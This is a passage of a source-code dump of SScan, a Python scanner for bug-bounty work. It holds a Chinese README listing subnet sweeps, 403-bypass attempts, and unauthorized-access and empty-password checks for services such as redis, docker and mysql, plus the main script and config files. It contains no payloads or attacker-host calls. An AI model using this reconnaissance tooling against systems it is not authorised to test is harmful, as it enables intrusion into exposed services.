├── README.md
├── SScan.py
├── config
├── __init__.py
├── banner.py
├── log.py
└── setting.py
├── images
├── image-20210106105118466.png
├── sscan.gif
└── sscan.svg
├── lib
├── __init__.py
├── common
│ ├── TestProxy.py
│ ├── __init__.py
│ ├── common.py
│ ├── connectionPool.py
│ ├── consle_width.py
│ ├── report.py
│ ├── scanner.py
│ └── utils.py
├── data
│ ├── GeoLite2-ASN.mmdb
│ ├── cdn_asn_list.json
│ ├── cdn_cname_keywords.json
│ ├── cdn_header_keys.json
│ ├── cdn_ip_cidr.json
│ └── fake_useragent.json
└── modules
│ ├── __init__.py
│ ├── fofa.py
│ └── iscdn.py
├── logs
└── sscan.log
├── report
└── _20210106_153943.html
├── requirements.txt
├── rules
├── .idea
│ ├── .gitignore
│ ├── inspectionProfiles
│ │ └── profiles_settings.xml
│ ├── misc.xml
│ ├── modules.xml
│ └── rules.iml
├── apache.txt
├── black.list
├── change_log.txt
├── common_app.txt
├── compressed_backup_files.txt
├── config_file.txt
├── dir.txt
├── directory_traversal.txt
├── disabled
│ └── .gitignore
├── druid.txt
├── git_and_svn.txt
├── graphite_ssrf.txt
├── iis.txt
├── java_server_faces2.txt
├── java_web_config_files.txt
├── phpinfo_or_apc.txt
├── phpmyadmin.txt
├── possible_flash_xss.txt
├── python_web.txt
├── resin_admin.txt
├── safetyEquipment.txt
├── sensitive_url.txt
├── shell_scripts.txt
├── source_code_disclosure.txt
├── springboot.txt
├── ssh_sensitive_file.txt
├── test_page.txt
├── tomcat_manager.txt
├── web_editors.txt
├── white.list
└── zabbix_jsrpc_sqli.txt
└── scripts
├── __init__.py
├── disabled
├── .gitignore
├── __init__.py
└── smb_ms17010.py
├── discuz_backup_file.py
├── is_admin_site.py
├── kong_admin_rest_api.py
├── log_files.py
├── mysql_Empty_pwd.py
├── outlook_web_app.py
├── readme.txt
├── scan_by_hostname_or_folder.py
├── sensitive_folders.py
├── tools
├── __init__.py
└── port_scan.py
├── unauthorized_access_CouchDB.py
├── unauthorized_access_Hadoop.py
├── unauthorized_access_Hadoop_yarn.py
├── unauthorized_access_docker.py
├── unauthorized_access_docker_registry_api.py
├── unauthorized_access_elasticsearch.py
├── unauthorized_access_ftp.py
├── unauthorized_access_jboss.py
├── unauthorized_access_jenkins.py
├── unauthorized_access_memcached.py
├── unauthorized_access_mongodb.py
├── unauthorized_access_postgresb.py
├── unauthorized_access_redis.py
├── unauthorized_access_rsync.py
├── unauthorized_access_zookeeper.py
└── wordpress_backup_file.py
/README.md:
--------------------------------------------------------------------------------
1 | ## SScan
2 |
3 | [](https://github.com/yhy0/SScan/)
4 |
5 | [](https://github.com/yhy0/SScan/)
6 |
7 | ### 前言
8 |
9 | 一款src捡洞扫描器,因没时间挖src,毕竟挖src是个费时费力的活,自19年8月起入坑至今,依靠 [BBScan](https://github.com/lijiejie/BBScan.git) 扫描出的信息和漏洞,利用业余时间从扫描报告中的资产**捡洞**和找洞,已经3次jd月度前十。萌发出自己写扫描器挖洞的念头,自动挖一些简单漏洞,赚点零花钱,同时提升一下开发能力,毕竟搞安全的不能不懂开发。
10 |
11 | 目前 [SScan](https://github.com/yhy0/SScan) 的主要逻辑还是在模仿 [BBScan](https://github.com/lijiejie/BBScan.git)。
12 |
13 | ### 使用效果图
14 |
15 | 
16 |
17 | 扫描结束后,结果报告在report目录下,并且存在漏洞时,默认会使用浏览器打开报告
18 |
19 | ## 使用及参数
20 |
21 | ```bash
22 | python3 SScan.py version 查看版本
23 | python3 SScan.py --help 获取帮助
24 | python3 SScan.py --host example.com run 单个目标
25 | python3 SScan.py --file domains.txt run 读取一个.txt文件
26 | python3 SScan.py --dire /Users/yhy/Desktop/dirs/ run 读取目录下的所有.txt
27 | python3 SScan.py --file domains.txt --network 24 run network设置一个子网掩码(8 ~ 31),
28 | 配合上面3个参数中任意一个。将扫描Target/MASK 网络下面的所有IP
29 | python3 SScan.py --host 127.0.0.1 --script unauthorized_access_redis,unauthorized_access_rsync run
30 | 只使用指定脚本
31 |
32 | 您可以通过在 config/setting.py 文件中指定fofa api信息, 调用fofa搜索更多的Web服务
33 |
34 | 其它参数:
35 | --t 扫描线程数, 默认10。
36 | --full 处理所有子目录。 /x/y/z/这样的链接,/x/ /x/y/也将被扫描,默认为True
37 | --crawl 爬取主页的标签, 默认为True
38 | --checkcdn 检查域名是否存在CDN,若存在则不对解析出的ip进行规则和脚本探测,默认为True
39 | --browser 检测完成后,使用默认浏览器打开扫描报告,默认为True
40 | --script 指定要使用的脚本,--script unauthorized_access_redis unauthorized_access_rsync, ... 脚本在scripts目录下
41 | --rule 指定要扫描的规则,--rule RuleFileName1,RuleFileName2,... 规则在rules目录下
42 | --script_only 只使用脚本进行扫描,不使用规则
43 | --noscripts 不使用脚本扫描
44 |
45 | ```
46 | ## 功能
47 |
48 | - [x] 常见目录扫描,比如备份文件、配置文件、日志文件等等,具体见`rules`目录下的详细规则
49 |
50 | - [x] 信息泄露漏洞,比如.idea、 .git、.DS_Store、springboot等等,具体见`rules`目录下的详细规则
51 |
52 | - [x] 后台登录页面资产发现
53 |
54 | - [x] 403页面绕过,具体绕过规则在`lib/common/scanner.py`的196行的`bypass_403`函数
55 |
56 | - [x] 扫描某个网段,通过 `--network 24` 指定扫描C段资产,进行漏洞和信息发现
57 |
58 | - [x] 跳过存在CDN的IP,当检测到url解析的IP符合CDN特征时,不会将ip加入扫描目标中,只会扫描url
59 |
60 | - [x] 一些常见未授权和弱口令检测,目前支持:
61 |
62 | redis、Hadoop、Hadoop yarn、docker、docker registry api、CouchDB、ftp、zookeeper、elasticsearch、memcached、mongodb、rsync、jenkins、jboss的未授权访问,mysql空口令、PostgreSQL 空口令 ,具体见`scripts` 目录
63 |
64 | 对于数据库口令检测,目前只是检测是否存在空口令检测,后续会考虑要不要加入一些弱口令,进行检测。像这样 https://github.com/se55i0n/DBScanner/blob/master/lib/exploit.py
65 |
66 | - [x] 当在 config/setting.py 文件中指定fofa api 信息时,会调用fofa接口,搜索更多的Web服务
67 |
68 | ## 后续计划
69 |
70 | - [ ] 将[Packer-Fuzzer](https://github.com/rtcatc/Packer-Fuzzer)项目中的一些功能集成进去,能够对js文件中的敏感信息、API进行测试
71 |
72 | - [x] 加入403 绕过 [BurpSuite_403Bypasser](https://github.com/sting8k/BurpSuite_403Bypasser)
73 |
74 | 使用BurpSuite 实验室[Lab: URL-based access control can be circumvented](https://portswigger.net/web-security/access-control/lab-url-based-access-control-can-be-circumvented) 进行测试
75 |
76 | 
77 |
78 | - [X] 调用Fofa Api,查询资产信息,更全面地扫描资产
79 |
80 | ## rules目录下的规则描述
81 |
82 | - black.list 规则黑名单,命中则跳过
83 |
84 | - White.list 规则白名单 ,命中则认为存在薄弱点,加入结果
85 |
86 | - rules目录下的一些字段含义,rules目录下常见的格式就是这种
87 |
88 | ```
89 | /WEB-INF/applicationContext-slave.xml {tag=" (default True)
42 | :param bool checkcdn: Check the CDN and skip the IP where the CDN exists (default True)
43 | :param bool full: Process all sub directories /x/y/z/,/x/ /x/y/ (default True)
44 | :param str script: ScriptName1,ScriptName2,...
45 | :param bool script_only: Scan with user scripts only
46 | :param bool noscripts: Disable all scripts (default False)
47 | :param bool browser: Do not open web browser to view report (default True)
48 |
49 | """
50 |
51 | def __init__(self, host=None, file=None, dire="", network=32, t=10, rule=None,
52 | full=True, script=None, noscripts=False, crawl=True,
53 | browser=True, script_only=False, checkcdn=True):
54 | self.host = host
55 | self.file = file
56 | self.rule_files = []
57 | self.script_files = []
58 | self.dire = dire
59 | self.network = network
60 | self.t = t
61 | self.rule = rule
62 | self.crawl = crawl
63 | self.checkcdn = checkcdn
64 | self.fileull = full
65 | self.scripts_only = script_only
66 | self.script = script
67 | self.no_scripts = noscripts
68 | self.browser = browser
69 |
70 | if self.file:
71 | self.input_files = [self.file]
72 | elif self.dire:
73 | self.input_files = glob.glob(self.dire + '/*.txt')
74 | elif self.host:
75 | self.input_files = [self.host]
76 | self.require_no_http = True # 所有插件都不依赖 HTTP 连接池
77 | self.require_index_doc = False # 插件需要请求首页
78 | self.require_ports = set() # 插件扫描所需端口
79 |
80 | # 加载相关配置
81 | def config_param(self):
82 | """
83 | Config parameter
84 | """
85 | if self.dire:
86 | self.dire = glob.glob(self.dire + '/*.txt')
87 |
88 | if self.rule is None:
89 | self.rule_files = glob.glob('rules/*.txt')
90 | else:
91 | if isinstance(self.rule, str):
92 | rule = self.rule.split()
93 | else:
94 | rule = self.rule
95 | for rule_name in rule:
96 | if not rule_name.endswith('.txt'):
97 | rule_name += '.txt'
98 | if not os.path.exists('rules/%s' % rule_name):
99 | logger.log('FATAL', 'Rule file not found: %s' % rule_name)
100 | exit(-1)
101 | self.rule_files.append(f'rules/{rule_name}')
102 |
103 | if not self.no_scripts:
104 | if self.script is None:
105 | self.script_files = glob.glob('scripts/*.py')
106 | else:
107 | if isinstance(self.script, str):
108 | script = self.script.split()
109 | else:
110 | script = self.script
111 | for script_name in script:
112 | if not script_name.lower().endswith('.py'):
113 | script_name += '.py'
114 | if not os.path.exists('scripts/%s' % script_name):
115 | logger.log('FATAL', 'Rule file not found: %s' % script_name)
116 | exit(-1)
117 |
118 | self.script_files.append('scripts/%s' % script_name)
119 | pattern = re.compile(r'ports_to_check.*?\\=(.*)')
120 |
121 | for _script in self.script_files:
122 | with open(_script, encoding='UTF-8') as f:
123 | content = f.read()
124 | if content.find('self.http_request') > 0 or content.find('self.session') > 0:
125 | self.require_no_http = False # 插件依赖HTTP连接池
126 | if content.find('self.index_') > 0:
127 | self.require_no_http = False
128 | self.require_index_doc = True
129 | # 获取插件需要的端口
130 | m = pattern.search(content)
131 | if m:
132 | m_str = m.group(1).strip()
133 | if m_str.find('#') > 0: # 去掉注释
134 | m_str = m_str[:m_str.find('#')]
135 | if m_str.find('[') < 0:
136 | if int(m_str) not in self.require_ports:
137 | self.require_ports.add(int(m_str))
138 | else:
139 | for port in eval(m_str):
140 | if port not in self.require_ports:
141 | self.require_ports.add(int(port))
142 |
143 | # 检查命令行输入
144 | def check_param(self):
145 | """
146 | Check parameter
147 | """
148 | if not (self.file or self.dire or self.host):
149 | msg = '\nself missing! One of following self should be specified \n' \
150 | ' \t--f TargetFile \n' \
151 | ' \t--d TargetDirectory \n' \
152 | ' \t--host www.host1.com www.host2.com 8.8.8.8'
153 | logger.log('FATAL', msg)
154 | exit(-1)
155 | if self.file and not os.path.isfile(self.file):
156 | logger.log('FATAL', 'TargetFile not found: %s' % self.file)
157 | exit(-1)
158 |
159 | if self.dire and not os.path.isdir(self.dire):
160 | logger.log('FATAL', 'TargetDirectory not found: %s' % self.dire)
161 | exit(-1)
162 |
163 | self.network = int(self.network)
164 | if not (8 <= self.network <= 32):
165 | logger.log('FATAL', 'Network should be an integer between 24 and 31')
166 | exit(-1)
167 |
168 | def main(self):
169 | q_targets = multiprocessing.Manager().Queue() # targets Queue
170 |
171 | q_targets_list = []
172 | q_results = multiprocessing.Manager().Queue() # log Queue
173 |
174 | for input_file in self.input_files:
175 | # 读取目标
176 | if self.host:
177 | target_list = self.host.replace(',', ' ').strip().split()
178 |
179 | elif self.file or self.dire:
180 | with open(input_file, encoding='UTF-8') as inFile:
181 | target_list = inFile.readlines()
182 |
183 | try:
184 | import threading
185 | # 实时生成报告
186 | target_count = len(target_list) # 目标数
187 | # 生成报告,管理标准输出
188 | threading.Thread(target=save_report, args=(self, q_results, input_file, target_count)).start()
189 |
190 | clear_queue(q_results)
191 | clear_queue(q_targets)
192 |
193 | start_time = time.time()
194 |
195 | # 根据电脑 CPU 的内核数量, 创建相应的进程池
196 | # count = multiprocessing.cpu_count()
197 | count = 16
198 | # 少量目标,至多创建2倍扫描进程
199 | if len(target_list) * 2 < count:
200 | count = len(target_list) * 2
201 | pool = multiprocessing.Pool(count)
202 | num = math.ceil(len(target_list)/count)
203 | domain_start_time = time.time()
204 | logger.log('INFOR', f'Domain name resolution, subnet mask processing, CDN detection, 80、443 port detection, FOFA search started.')
205 | for i in range(0, len(target_list), count):
206 | target = target_list[i:i + count]
207 | pool.apply_async(prepare_targets, args=(target, q_targets, self))
208 | pool.close()
209 | pool.join()
210 |
211 | logger.log("INFOR", f'Domain name resolution, subnet mask processing, CDN detection, 80、443 port detection, FOFA search is over in %.1f seconds!' % (
212 | time.time() - domain_start_time))
213 | time.sleep(1.0)
214 |
215 | while True:
216 | if not q_targets.empty():
217 | q_targets_list.append(q_targets.get())
218 | else:
219 | break
220 |
221 | logger.log("INFOR", f'Targets process all done in %.1f seconds!' % (time.time() - start_time))
222 |
223 | # q_targets.get() {'scheme': 'https', 'host': '127.0.0.1', 'port': 443, 'path': '', 'ports_open': [80, 443], 'is_neighbor': 0}
224 |
225 | if len(target_list) * 2 < count:
226 | count = len(target_list) * 2
227 |
228 | # pool = multiprocessing.Pool(count)
229 | # logger.log('INFOR', f'{count} scan process created.')
230 | #
231 | # for target in q_targets_list:
232 | # pool.apply_async(scan_process, args=(target, q_results, self))
233 | #
234 | # pool.close()
235 | # pool.join()
236 |
237 | # 进度条设置
238 | from rich.progress import (
239 | BarColumn,
240 | TimeRemainingColumn,
241 | Progress,
242 | )
243 | progress = Progress(
244 | "[progress.description]{task.description}",
245 | BarColumn(),
246 | "[progress.percentage]{task.percentage:>3.0f}%",
247 | TimeRemainingColumn(),
248 | "[bold red]{task.completed}/{task.total}",
249 | transient=True, # 100%后隐藏进度条
250 | )
251 | with progress:
252 | targets = []
253 | for target in q_targets_list:
254 | tmp = [target, q_results, self]
255 | targets.append(tmp)
256 |
257 | task_id = progress.add_task("[cyan]Leak detection...", total=len(targets), start=False)
258 |
259 | with multiprocessing.Pool(processes=16) as pool:
260 | results = pool.imap_unordered(scan_process, targets)
261 | for result in results:
262 | # progress.print(result)
263 | progress.advance(task_id)
264 |
265 | time.sleep(1.0)
266 |
267 | cost_time = time.time() - start_time
268 | cost_min = int(cost_time / 60)
269 | cost_min = '%s min ' % cost_min if cost_min > 0 else ''
270 | cost_seconds = '%.1f' % (cost_time % 60)
271 | logger.log('INFOR', f'Scanned {len(q_targets_list)} targets in {cost_min}{cost_seconds} seconds.')
272 |
273 | except KeyboardInterrupt as e:
274 | setting.stop_me = True
275 | logger.log('INFOR', 'Scan aborted.')
276 | exit(-1)
277 | except FileNotFoundError as e:
278 | logger.log('INFOR', 'Scan aborted.')
279 | exit(-1)
280 | pass
281 | except Exception as e:
282 | logger.log('ERROR', '[__main__.exception] %s %s' % (type(e), str(e)))
283 | setting.stop_me = True
284 |
285 | def print(self):
286 | """
287 | InfoScan running entrance
288 | :return: All subdomain log
289 | :rtype: list
290 | """
291 | print(SScan_banner)
292 | dt = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
293 | print(f'[*] Starting InfoScan @ {dt}\n')
294 | self.check_param()
295 | self.config_param()
296 | check_fofa()
297 |
298 | if self.no_scripts:
299 | logger.log('INFOR', '* Scripts scan was disabled.')
300 | if self.require_ports:
301 | logger.log('INFOR', '* Scripts scan port check: %s' % ','.join([str(x) for x in self.require_ports]))
302 |
303 | def run(self):
304 | self.print()
305 | # 网络连通性检查
306 | # testProxy(cmd, 1)
307 | # if testProxy(1):
308 | self.main()
309 |
310 | @staticmethod
311 | def version():
312 | """
313 | Print version information and exit
314 | """
315 | print(SScan_banner)
316 | exit(0)
317 |
318 |
319 | if __name__ == '__main__':
320 | # 优雅的使用 ctrl c 退出
321 | signal.signal(signal.SIGINT, ctrl_quit)
322 | fire.Fire(SScan)
323 |
--------------------------------------------------------------------------------
/config/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
--------------------------------------------------------------------------------
/config/banner.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
5 | yellow = '\033[01;33m'
6 | white = '\033[01;37m'
7 | green = '\033[01;32m'
8 | blue = '\033[01;34m'
9 | red = '\033[1;31m'
10 | end = '\033[0m'
11 |
12 | version = 'v0.5'
13 | message = white + '{' + red + version + ' #dev' + white + '}'
14 |
15 | SScan_banner = f"""{yellow}
16 | SScan is a slow sensitive information detection and vulnerability scanning program.{green}
17 | _____ _____
18 | / ____/ ____|
19 | | (___| (___ ___ __ _ _ __ {message}{blue}
20 | \___ \\___ \ / __/ _` | '_ \
21 | ____) |___) | (_| (_| | | | |
22 | |_____/_____/ \___\__,_|_| |_|
23 |
24 | {red}By yhy(https://github.com/yhy0/SScan.git) {blue}
25 | """
26 |
27 |
--------------------------------------------------------------------------------
/config/log.py:
--------------------------------------------------------------------------------
1 | '''
2 | 使用oneforall中的配置
3 | https://github.com/shmilylty/OneForAll/blob/master/config/log.py
4 | '''
5 |
6 | import sys
7 | import pathlib
8 |
9 | from loguru import logger
10 |
11 | # 路径设置
12 | relative_directory = pathlib.Path(__file__).parent.parent # OneForAll代码相对路径
13 | log_save_dir = relative_directory.joinpath('logs') # 日志结果保存目录
14 | log_path = log_save_dir.joinpath(f'sscan.log') # OneForAll日志保存路径
15 |
16 | # 日志配置
17 | # 终端日志输出格式
18 | stdout_fmt = '\r{time:MM-DD HH:mm:ss,SS} ' \
19 | '[{level: <5} ] ' \
20 | '{module} :{line} - ' \
21 | '{message} '
22 |
23 | # 日志文件记录格式
24 | logfile_fmt = '{time:YYYY-MM-DD HH:mm:ss,SSS} ' \
25 | '[{level: <5} ] ' \
26 | '{process.name}({process.id}) :' \
27 | '{thread.name: <18}({thread.id: <5}) | ' \
28 | '{module} .{function} :' \
29 | '{line} - {message} '
30 |
31 | logger.remove()
32 | logger.level(name='TRACE', color='', icon='✏️')
33 | logger.level(name='DEBUG', color='', icon='🐞 ')
34 | logger.level(name='INFOR', no=20, color='', icon='ℹ️')
35 | logger.level(name='QUITE', no=25, color='', icon='🤫 ')
36 | logger.level(name='ALERT', no=30, color='', icon='⚠️')
37 | logger.level(name='ERROR', color='', icon='❌️')
38 | logger.level(name='FATAL', no=50, color='', icon='☠️')
39 |
40 | # 如果你想在命令终端静默运行OneForAll,可以将以下一行中的level设置为QUITE
41 | # 命令终端日志级别默认为INFOR
42 | # 默认为线程安全,但不是异步或多进程安全的,添加参数 enqueue=True 即可:
43 | logger.add(sys.stderr, level='INFOR', format=stdout_fmt, enqueue=True)
44 | logger.add(log_path, level='DEBUG', format=logfile_fmt, enqueue=True, encoding='utf-8')
45 |
--------------------------------------------------------------------------------
/config/setting.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
5 | import pathlib
6 |
7 | # 路径设置
8 | relative_directory = pathlib.Path(__file__).parent.parent # 项目代码相对路径
9 | data_storage_dir = relative_directory.joinpath('lib/data') # 检查cdn所用到的数据存放目录
10 |
11 | stop_me = False
12 |
13 | ports_saved_to_file = False
14 |
15 | default_headers = {
16 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36",
17 | "Connection": "close",
18 | "Cache-Control": "max-age=0",
19 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"
20 | }
21 |
22 | fofaApi = {
23 | "email": "",
24 | "key": "",
25 | }
26 |
27 | threadNum = 100
28 |
29 | # 每次查询返回记录数
30 | fofaSize = 100
31 |
32 | # 限定 fofa 查询结果国家地区
33 |
34 | fofaCountry = 'CN'
35 |
36 | USER_AGENTS = [
37 | "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
38 | "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
39 | "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0",
40 | "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; rv:11.0) like Gecko",
41 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
42 | "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)",
43 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)",
44 | "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
45 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
46 | "Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
47 | "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11",
48 | "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11",
49 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
50 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)",
51 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0)",
52 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
53 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; The World)",
54 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SE 2.X MetaSr 1.0; SE 2.X MetaSr 1.0; .NET CLR 2.0.50727; SE 2.X MetaSr 1.0)",
55 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)",
56 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser)",
57 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
58 | "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5",
59 | "Mozilla/5.0 (iPod; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5",
60 | "Mozilla/5.0 (iPad; U; CPU OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5",
61 | "Mozilla/5.0 (Linux; U; Android 2.3.7; en-us; Nexus One Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
62 | "MQQBrowser/26 Mozilla/5.0 (Linux; U; Android 2.3.7; zh-cn; MB200 Build/GRJ22; CyanogenMod-7) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
63 | "Opera/9.80 (Android 2.3.4; Linux; Opera Mobi/build-1107180945; U; en-GB) Presto/2.8.149 Version/11.10",
64 | "Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13",
65 | "Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/534.1+ (KHTML, like Gecko) Version/6.0.0.337 Mobile Safari/534.1+",
66 | "Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.0; U; en-US) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/233.70 Safari/534.6 TouchPad/1.0",
67 | "Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/20.0.019; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/525 (KHTML, like Gecko) BrowserNG/7.1.18124",
68 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; HTC; Titan)",
69 | "UCWEB7.0.2.37/28/999",
70 | "NOKIA5700/ UCWEB7.0.2.37/28/999",
71 | "Openwave/ UCWEB7.0.2.37/28/999",
72 | "Mozilla/4.0 (compatible; MSIE 6.0; ) Opera/UCWEB7.0.2.37/28/999",
73 | "Mozilla/6.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/8.0 Mobile/10A5376e Safari/8536.25",
74 | ]
75 |
--------------------------------------------------------------------------------
/images/image-20210106105118466.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/olist213/SScan/a8e1e5e71a07080b382bbbc36941e26cc9faf71c/images/image-20210106105118466.png
--------------------------------------------------------------------------------
/images/sscan.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/olist213/SScan/a8e1e5e71a07080b382bbbc36941e26cc9faf71c/images/sscan.gif
--------------------------------------------------------------------------------
/lib/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
--------------------------------------------------------------------------------
/lib/common/TestProxy.py:
--------------------------------------------------------------------------------
1 | # !/usr/bin/env python3
2 | # -*- encoding: utf-8 -*-
3 |
4 | import requests
5 | from config.log import logger
6 |
7 | # def testProxy(options,show):
8 | def testProxy(show):
9 | try:
10 | url = "http://myip.ipip.net/"
11 | # proxy_data = {
12 | # 'http': options.proxy,
13 | # 'https': options.proxy,
14 | # }
15 |
16 | ipAddr = requests.get(url, timeout=7, verify=False).text[3:].strip()
17 | # ipAddr = requests.get(url, proxies=proxy_data, timeout=7, verify=False).text.strip()
18 | if show == 1:
19 | logger.log('INFOR', f'[+] 网络连通性检测通过,当前出口{ipAddr}')
20 | return True
21 | except:
22 | if show == 1:
23 | logger.log('ERROR', f'外网连接失败,请检查当前网络状况或者代理情况')
24 | return False
25 |
26 |
--------------------------------------------------------------------------------
/lib/common/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
--------------------------------------------------------------------------------
/lib/common/common.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding:utf-8 -*-
3 | # @Author : yhy
4 |
5 | import asyncio
6 | import ipaddress
7 | from config.log import logger
8 | from urllib.parse import urlparse
9 | import socket
10 | from lib.common.scanner import Scanner
11 | from lib.modules.iscdn import check_cdn
12 | from config.setting import fofaApi
13 | from lib.modules.fofa import fmain
14 |
15 | # 进度条设置
16 | from rich.progress import (
17 | BarColumn,
18 | TimeRemainingColumn,
19 | Progress,
20 | )
21 |
22 | # 扫描进程
23 | def scan_process(targets):
24 | target, q_results, args = targets[0], targets[1], targets[2]
25 | scanner = Scanner(args=args)
26 | try:
27 | '''
28 | {'scheme': 'http', 'host': '47.97.164.40', 'port': 80, 'path': '', 'ports_open': [80], 'is_neighbor': 0}
29 | '''
30 | # 处理目标信息,加载规则,脚本等等
31 | ret = scanner.init_from_url(target)
32 | if ret:
33 | host, results = scanner.scan()
34 | if results:
35 | q_results.put((host, results))
36 |
37 | except Exception as e:
38 | logger.log('ERROR', f'{str(e)}')
39 | finally:
40 | return target
41 |
42 |
43 | # 检测端口是否开放
44 | async def port_scan_check(ip_port, semaphore, progress, task):
45 | async with semaphore:
46 | ip, port = ip_port[0], ip_port[1]
47 | conn = asyncio.open_connection(ip, port)
48 | try:
49 | reader, writer = await asyncio.wait_for(conn, timeout=10)
50 | # print(ip, port, 'open', ip_port[2], ip_port[3], ip_port[4])
51 | # 127.0.0.1 3306 open http /test.html 8080
52 | conn.close()
53 | progress.update(task, advance=1)
54 | return ip, port, 'open', ip_port[2], ip_port[3], ip_port[4]
55 | except Exception as e:
56 | conn.close()
57 | progress.update(task, advance=1)
58 | return ip, port, 'close', ip_port[2], ip_port[3], ip_port[4]
59 |
60 |
61 | # 对给定目标进行80、443、指定的端口、脚本需要的端口进行探测,
62 | def get_ip_port_list(queue_targets, args):
63 | ip_port_list = []
64 | for _target in queue_targets:
65 | url = _target
66 | # scheme netloc path
67 | if url.find('://') < 0:
68 | scheme = 'unknown'
69 | netloc = url[:url.find('/')] if url.find('/') > 0 else url
70 | path = ''
71 | else:
72 | # scheme='http', netloc='www.baidu.com:80', path='', params='', query='', fragment=''
73 | scheme, netloc, path, params, query, fragment = urlparse(url, 'http')
74 |
75 | # 指定端口时需要,检查指定的端口是否开放
76 | if netloc.find(':') >= 0:
77 | _ = netloc.split(':')
78 | host = _[0]
79 | port = int(_[1])
80 | else:
81 | host = netloc
82 | port = None
83 |
84 | if scheme == 'https' and port is None:
85 | port = 443
86 | elif scheme == 'http' and port is None:
87 | port = 80
88 |
89 | if scheme == 'unknown':
90 | if port == 80:
91 | scheme = 'http'
92 | elif port == 443:
93 | scheme = 'https'
94 |
95 | if port: # url中指定了协议或端口
96 | ip_port_list.append((host, port, scheme, path, port))
97 | else: # url中没指定扫描80,443
98 | port = 80
99 | ip_port_list.append((host, 80, scheme, path, 80))
100 | ip_port_list.append((host, 443, scheme, path, 443))
101 |
102 | # 没有禁用插件时,把插件中需要扫描的端口加进去
103 | if not args.no_scripts:
104 | for s_port in args.require_ports:
105 | ip_port_list.append((host, s_port, scheme, path, port))
106 |
107 | return list(set(ip_port_list))
108 |
109 |
110 | # 对目标进行封装,格式化
111 | # {'127.0.0.1': {'scheme': 'http', 'host': '127.0.0.1', 'port': 80, 'path': '', 'ports_open': [80, 3306], 's_port': -1}
112 | def get_target(tasks, fofa_result):
113 | targets = {}
114 | for task in tasks:
115 | if task.result()[2] == 'open':
116 | host = task.result()[0]
